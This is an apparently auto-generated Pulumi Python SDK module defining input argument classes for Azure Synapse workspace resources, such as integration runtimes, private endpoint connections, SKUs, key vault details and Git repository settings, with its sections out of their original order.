pulumi.set(__self__, "linked_access_check_on_target_resource", linked_access_check_on_target_resource)
if prevent_data_exfiltration is not None:
pulumi.set(__self__, "prevent_data_exfiltration", prevent_data_exfiltration)
@property
@pulumi.getter(name="allowedAadTenantIdsForLinking")
def allowed_aad_tenant_ids_for_linking(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed Aad Tenant Ids For Linking
"""
return pulumi.get(self, "allowed_aad_tenant_ids_for_linking")
@allowed_aad_tenant_ids_for_linking.setter
def allowed_aad_tenant_ids_for_linking(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_aad_tenant_ids_for_linking", value)
@property
@pulumi.getter(name="linkedAccessCheckOnTargetResource")
def linked_access_check_on_target_resource(self) -> Optional[pulumi.Input[bool]]:
"""
Linked Access Check On Target Resource
"""
return pulumi.get(self, "linked_access_check_on_target_resource")
@linked_access_check_on_target_resource.setter
def linked_access_check_on_target_resource(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "linked_access_check_on_target_resource", value)
@property
@pulumi.getter(name="preventDataExfiltration")
def prevent_data_exfiltration(self) -> Optional[pulumi.Input[bool]]:
"""
Prevent Data Exfiltration
"""
return pulumi.get(self, "prevent_data_exfiltration")
@prevent_data_exfiltration.setter
def prevent_data_exfiltration(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_data_exfiltration", value)
@pulumi.input_type
class PrivateEndpointConnectionArgs:
def __init__(__self__, *,
private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
"""
A private endpoint connection
:param pulumi.Input['PrivateLinkServiceConnectionStateArgs'] private_link_service_connection_state: Connection state of the private endpoint connection.
"""
if private_link_service_connection_state is not None:
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
"""
Connection state of the private endpoint connection.
"""
return pulumi.get(self, "private_link_service_connection_state")
@private_link_service_connection_state.setter
def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]):
pulumi.set(self, "private_link_service_connection_state", value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
Connection state details of the private endpoint
:param pulumi.Input[str] description: The private link service connection description.
:param pulumi.Input[str] status: The private link service connection status.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The private link service connection description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The private link service connection status.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class PurviewConfigurationArgs:
def __init__(__self__, *,
purview_resource_id: Optional[pulumi.Input[str]] = None):
"""
Purview Configuration
:param pulumi.Input[str] purview_resource_id: Purview Resource ID
"""
if purview_resource_id is not None:
pulumi.set(__self__, "purview_resource_id", purview_resource_id)
@property
@pulumi.getter(name="purviewResourceId")
def purview_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
Purview Resource ID
"""
return pulumi.get(self, "purview_resource_id")
@purview_resource_id.setter
def purview_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "purview_resource_id", value)
@pulumi.input_type
class SecureStringArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
"""
Azure Synapse secure string definition. The string value will be masked with asterisks '*' during Get or List API calls.
:param pulumi.Input[str] type: Type of the secret.
Expected value is 'SecureString'.
:param pulumi.Input[str] value: Value of secure string.
"""
pulumi.set(__self__, "type", 'SecureString')
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the secret.
Expected value is 'SecureString'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Value of secure string.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]] = None):
"""
Self-hosted integration runtime.
:param pulumi.Input[str] type: The type of integration runtime.
Expected value is 'SelfHosted'.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']] linked_info: Linked integration runtime type from data factory
"""
pulumi.set(__self__, "type", 'SelfHosted')
if description is not None:
pulumi.set(__self__, "description", description)
if linked_info is not None:
pulumi.set(__self__, "linked_info", linked_info)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of integration runtime.
Expected value is 'SelfHosted'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedInfo")
def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]:
"""
Linked integration runtime type from data factory
"""
return pulumi.get(self, "linked_info")
@linked_info.setter
def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]):
pulumi.set(self, "linked_info", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input[str]] = None):
"""
SQL pool SKU
:param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
:param pulumi.Input[str] name: The SKU name
:param pulumi.Input[str] tier: The service tier
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if name is not None:
pulumi.set(__self__, "name", name)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The SKU name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
"""
The service tier
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs:
def __init__(__self__, *,
result: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
Properties for an Sql pool vulnerability assessment rule baseline's result.
:param pulumi.Input[Sequence[pulumi.Input[str]]] result: The rule baseline result
"""
pulumi.set(__self__, "result", result)
@property
@pulumi.getter
def result(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The rule baseline result
"""
return pulumi.get(self, "result")
@result.setter
def result(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "result", value)
@pulumi.input_type
class VirtualNetworkProfileArgs:
def __init__(__self__, *,
compute_subnet_id: Optional[pulumi.Input[str]] = None):
"""
Virtual Network Profile
:param pulumi.Input[str] compute_subnet_id: Subnet ID used for computes in workspace
"""
if compute_subnet_id is not None:
pulumi.set(__self__, "compute_subnet_id", compute_subnet_id)
@property
@pulumi.getter(name="computeSubnetId")
def compute_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
Subnet ID used for computes in workspace
"""
return pulumi.get(self, "compute_subnet_id")
@compute_subnet_id.setter
def compute_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compute_subnet_id", value)
@pulumi.input_type
class VulnerabilityAssessmentRecurringScansPropertiesArgs:
def __init__(__self__, *,
email_subscription_admins: Optional[pulumi.Input[bool]] = None,
emails: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None):
"""
Properties of a Vulnerability Assessment recurring scans.
:param pulumi.Input[bool] email_subscription_admins: Specifies that the schedule scan notification will be is sent to the subscription administrators.
:param pulumi.Input[Sequence[pulumi.Input[str]]] emails: Specifies an array of e-mail addresses to which the scan notification is sent.
:param pulumi.Input[bool] is_enabled: Recurring scans state.
"""
if email_subscription_admins is None:
email_subscription_admins = True
if email_subscription_admins is not None:
pulumi.set(__self__, "email_subscription_admins", email_subscription_admins)
if emails is not None:
pulumi.set(__self__, "emails", emails)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
@property
@pulumi.getter(name="emailSubscriptionAdmins")
def email_subscription_admins(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies that the schedule scan notification will be is sent to the subscription administrators.
"""
return pulumi.get(self, "email_subscription_admins")
@email_subscription_admins.setter
def email_subscription_admins(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "email_subscription_admins", value)
@property
@pulumi.getter
def emails(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies an array of e-mail addresses to which the scan notification is sent.
"""
return pulumi.get(self, "emails")
@emails.setter
def emails(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "emails", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Recurring scans state.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class WorkspaceKeyDetailsArgs:
def __init__(__self__, *,
key_vault_url: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Details of the customer managed key associated with the workspace
:param pulumi.Input[str] key_vault_url: Workspace Key sub-resource key vault url
:param pulumi.Input[str] name: Workspace Key sub-resource name
"""
if key_vault_url is not None:
pulumi.set(__self__, "key_vault_url", key_vault_url)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="keyVaultUrl")
def key_vault_url(self) -> Optional[pulumi.Input[str]]:
"""
Workspace Key sub-resource key vault url
"""
return pulumi.get(self, "key_vault_url")
@key_vault_url.setter
def key_vault_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_url", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Workspace Key sub-resource name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class WorkspaceRepositoryConfigurationArgs:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
client_id: Optional[pulumi.Input[str]] = None,
client_secret: Optional[pulumi.Input['GitHubClientSecretArgs']] = None,
collaboration_branch: Optional[pulumi.Input[str]] = None,
host_name: Optional[pulumi.Input[str]] = None,
last_commit_id: Optional[pulumi.Input[str]] = None,
project_name: Optional[pulumi.Input[str]] = None,
repository_name: Optional[pulumi.Input[str]] = None,
root_folder: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Git integration settings
:param pulumi.Input[str] account_name: Account name
:param pulumi.Input[str] client_id: GitHub bring your own app client id
:param pulumi.Input['GitHubClientSecretArgs'] client_secret: GitHub bring your own app client secret information.
:param pulumi.Input[str] collaboration_branch: Collaboration branch
:param pulumi.Input[str] host_name: GitHub Enterprise host name. For example: https://github.mydomain.com
:param pulumi.Input[str] last_commit_id: The last commit ID
:param pulumi.Input[str] project_name: VSTS project name
:param pulumi.Input[str] repository_name: Repository name
:param pulumi.Input[str] root_folder: Root folder to use in the repository
:param pulumi.Input[str] tenant_id: The VSTS tenant ID
:param pulumi.Input[str] type: Type of workspace repositoryID configuration. Example WorkspaceVSTSConfiguration, WorkspaceGitHubConfiguration
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if collaboration_branch is not None:
pulumi.set(__self__, "collaboration_branch", collaboration_branch)
if host_name is not None:
pulumi.set(__self__, "host_name", host_name)
if last_commit_id is not None:
pulumi.set(__self__, "last_commit_id", last_commit_id)
if project_name is not None:
pulumi.set(__self__, "project_name", project_name)
if repository_name is not None:
pulumi.set(__self__, "repository_name", repository_name)
if root_folder is not None:
pulumi.set(__self__, "root_folder", root_folder)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
Account name
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[str]]:
"""
GitHub bring your own app client id
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input['GitHubClientSecretArgs']]:
"""
GitHub bring your own app client secret information.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input['GitHubClientSecretArgs']]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="collaborationBranch")
def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
"""
Collaboration branch
"""
return pulumi.get(self, "collaboration_branch")
@collaboration_branch.setter
def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "collaboration_branch", value)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> Optional[pulumi.Input[str]]:
"""
GitHub Enterprise host name. For example: https://github.mydomain.com
"""
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter(name="lastCommitId")
def last_commit_id(self) -> Optional[pulumi.Input[str]]:
"""
The last commit ID
"""
return pulumi.get(self, "last_commit_id")
@last_commit_id.setter
def last_commit_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_commit_id", value)
@property
@pulumi.getter(name="projectName")
def project_name(self) -> Optional[pulumi.Input[str]]:
"""
VSTS project name
"""
return pulumi.get(self, "project_name")
@project_name.setter
def project_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_name", value)
@property
@pulumi.getter(name="repositoryName")
def repository_name(self) -> Optional[pulumi.Input[str]]:
"""
Repository name
"""
return pulumi.get(self, "repository_name")
@repository_name.setter
def repository_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repository_name", value)
@property
@pulumi.getter(name="rootFolder")
def root_folder(self) -> Optional[pulumi.Input[str]]:
"""
Root folder to use in the repository
"""
return pulumi.get(self, "root_folder")
@root_folder.setter
def root_folder(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_folder", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The VSTS tenant ID
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Type of workspace repositoryID configuration. Example WorkspaceVSTSConfiguration, WorkspaceGitHubConfiguration
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
| 39.099005 | 247 | 0.663935 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AutoPausePropertiesArgs',
'AutoScalePropertiesArgs',
'CmdkeySetupArgs',
'ComponentSetupArgs',
'CustomerManagedKeyDetailsArgs',
'DataLakeStorageAccountDetailsArgs',
'DynamicExecutorAllocationArgs',
'EncryptionDetailsArgs',
'EntityReferenceArgs',
'EnvironmentVariableSetupArgs',
'GitHubClientSecretArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataFlowPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'LibraryInfoArgs',
'LibraryRequirementsArgs',
'LinkedIntegrationRuntimeKeyAuthorizationArgs',
'LinkedIntegrationRuntimeRbacAuthorizationArgs',
'ManagedIdentityArgs',
'ManagedIntegrationRuntimeArgs',
'ManagedVirtualNetworkReferenceArgs',
'ManagedVirtualNetworkSettingsArgs',
'PrivateEndpointConnectionArgs',
'PrivateLinkServiceConnectionStateArgs',
'PurviewConfigurationArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'SkuArgs',
'SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs',
'VirtualNetworkProfileArgs',
'VulnerabilityAssessmentRecurringScansPropertiesArgs',
'WorkspaceKeyDetailsArgs',
'WorkspaceRepositoryConfigurationArgs',
]
@pulumi.input_type
class AutoPausePropertiesArgs:
def __init__(__self__, *,
delay_in_minutes: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None):
if delay_in_minutes is not None:
pulumi.set(__self__, "delay_in_minutes", delay_in_minutes)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter(name="delayInMinutes")
def delay_in_minutes(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "delay_in_minutes")
@delay_in_minutes.setter
def delay_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "delay_in_minutes", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class AutoScalePropertiesArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
max_node_count: Optional[pulumi.Input[int]] = None,
min_node_count: Optional[pulumi.Input[int]] = None):
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if max_node_count is not None:
pulumi.set(__self__, "max_node_count", max_node_count)
if min_node_count is not None:
pulumi.set(__self__, "min_node_count", min_node_count)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="maxNodeCount")
def max_node_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_node_count")
@max_node_count.setter
def max_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_node_count", value)
@property
@pulumi.getter(name="minNodeCount")
def min_node_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_node_count")
@min_node_count.setter
def min_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_node_count", value)
@pulumi.input_type
class CmdkeySetupArgs:
def __init__(__self__, *,
password: pulumi.Input['SecureStringArgs'],
target_name: Any,
type: pulumi.Input[str],
user_name: Any):
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "target_name", target_name)
pulumi.set(__self__, "type", 'CmdkeySetup')
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def password(self) -> pulumi.Input['SecureStringArgs']:
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="targetName")
def target_name(self) -> Any:
return pulumi.get(self, "target_name")
@target_name.setter
def target_name(self, value: Any):
pulumi.set(self, "target_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Any:
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Any):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ComponentSetupArgs:
def __init__(__self__, *,
component_name: pulumi.Input[str],
type: pulumi.Input[str],
license_key: Optional[pulumi.Input['SecureStringArgs']] = None):
pulumi.set(__self__, "component_name", component_name)
pulumi.set(__self__, "type", 'ComponentSetup')
if license_key is not None:
pulumi.set(__self__, "license_key", license_key)
@property
@pulumi.getter(name="componentName")
def component_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "component_name")
@component_name.setter
def component_name(self, value: pulumi.Input[str]):
pulumi.set(self, "component_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="licenseKey")
def license_key(self) -> Optional[pulumi.Input['SecureStringArgs']]:
return pulumi.get(self, "license_key")
@license_key.setter
def license_key(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "license_key", value)
@pulumi.input_type
class CustomerManagedKeyDetailsArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']] = None):
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]):
pulumi.set(self, "key", value)
@pulumi.input_type
class DataLakeStorageAccountDetailsArgs:
def __init__(__self__, *,
account_url: Optional[pulumi.Input[str]] = None,
filesystem: Optional[pulumi.Input[str]] = None):
if account_url is not None:
pulumi.set(__self__, "account_url", account_url)
if filesystem is not None:
pulumi.set(__self__, "filesystem", filesystem)
@property
@pulumi.getter(name="accountUrl")
def account_url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "account_url")
@account_url.setter
def account_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_url", value)
@property
@pulumi.getter
def filesystem(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "filesystem")
@filesystem.setter
def filesystem(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filesystem", value)
@pulumi.input_type
class DynamicExecutorAllocationArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None):
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class EncryptionDetailsArgs:
def __init__(__self__, *,
cmk: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']] = None):
if cmk is not None:
pulumi.set(__self__, "cmk", cmk)
@property
@pulumi.getter
def cmk(self) -> Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]:
return pulumi.get(self, "cmk")
@cmk.setter
def cmk(self, value: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]):
pulumi.set(self, "cmk", value)
@pulumi.input_type
class EntityReferenceArgs:
def __init__(__self__, *,
reference_name: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]] = None):
if reference_name is not None:
pulumi.set(__self__, "reference_name", reference_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class EnvironmentVariableSetupArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
variable_name: pulumi.Input[str],
variable_value: pulumi.Input[str]):
pulumi.set(__self__, "type", 'EnvironmentVariableSetup')
pulumi.set(__self__, "variable_name", variable_name)
pulumi.set(__self__, "variable_value", variable_value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="variableName")
def variable_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "variable_name")
@variable_name.setter
def variable_name(self, value: pulumi.Input[str]):
pulumi.set(self, "variable_name", value)
@property
@pulumi.getter(name="variableValue")
def variable_value(self) -> pulumi.Input[str]:
return pulumi.get(self, "variable_value")
@variable_value.setter
def variable_value(self, value: pulumi.Input[str]):
pulumi.set(self, "variable_value", value)
@pulumi.input_type
class GitHubClientSecretArgs:
def __init__(__self__, *,
byoa_secret_akv_url: Optional[pulumi.Input[str]] = None,
byoa_secret_name: Optional[pulumi.Input[str]] = None):
if byoa_secret_akv_url is not None:
pulumi.set(__self__, "byoa_secret_akv_url", byoa_secret_akv_url)
if byoa_secret_name is not None:
pulumi.set(__self__, "byoa_secret_name", byoa_secret_name)
@property
@pulumi.getter(name="byoaSecretAkvUrl")
def byoa_secret_akv_url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "byoa_secret_akv_url")
@byoa_secret_akv_url.setter
def byoa_secret_akv_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "byoa_secret_akv_url", value)
@property
@pulumi.getter(name="byoaSecretName")
def byoa_secret_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "byoa_secret_name")
@byoa_secret_name.setter
def byoa_secret_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "byoa_secret_name", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
def __init__(__self__, *,
data_flow_properties: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
node_size: Optional[pulumi.Input[str]] = None,
number_of_nodes: Optional[pulumi.Input[int]] = None,
v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
if data_flow_properties is not None:
pulumi.set(__self__, "data_flow_properties", data_flow_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if max_parallel_executions_per_node is not None:
pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
if node_size is not None:
pulumi.set(__self__, "node_size", node_size)
if number_of_nodes is not None:
pulumi.set(__self__, "number_of_nodes", number_of_nodes)
if v_net_properties is not None:
pulumi.set(__self__, "v_net_properties", v_net_properties)
@property
@pulumi.getter(name="dataFlowProperties")
def data_flow_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]:
return pulumi.get(self, "data_flow_properties")
@data_flow_properties.setter
def data_flow_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]):
pulumi.set(self, "data_flow_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maxParallelExecutionsPerNode")
def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_parallel_executions_per_node")
@max_parallel_executions_per_node.setter
def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_parallel_executions_per_node", value)
@property
@pulumi.getter(name="nodeSize")
def node_size(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "node_size")
@node_size.setter
def node_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_size", value)
@property
@pulumi.getter(name="numberOfNodes")
def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "number_of_nodes")
@number_of_nodes.setter
def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_nodes", value)
@property
@pulumi.getter(name="vNetProperties")
def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
return pulumi.get(self, "v_net_properties")
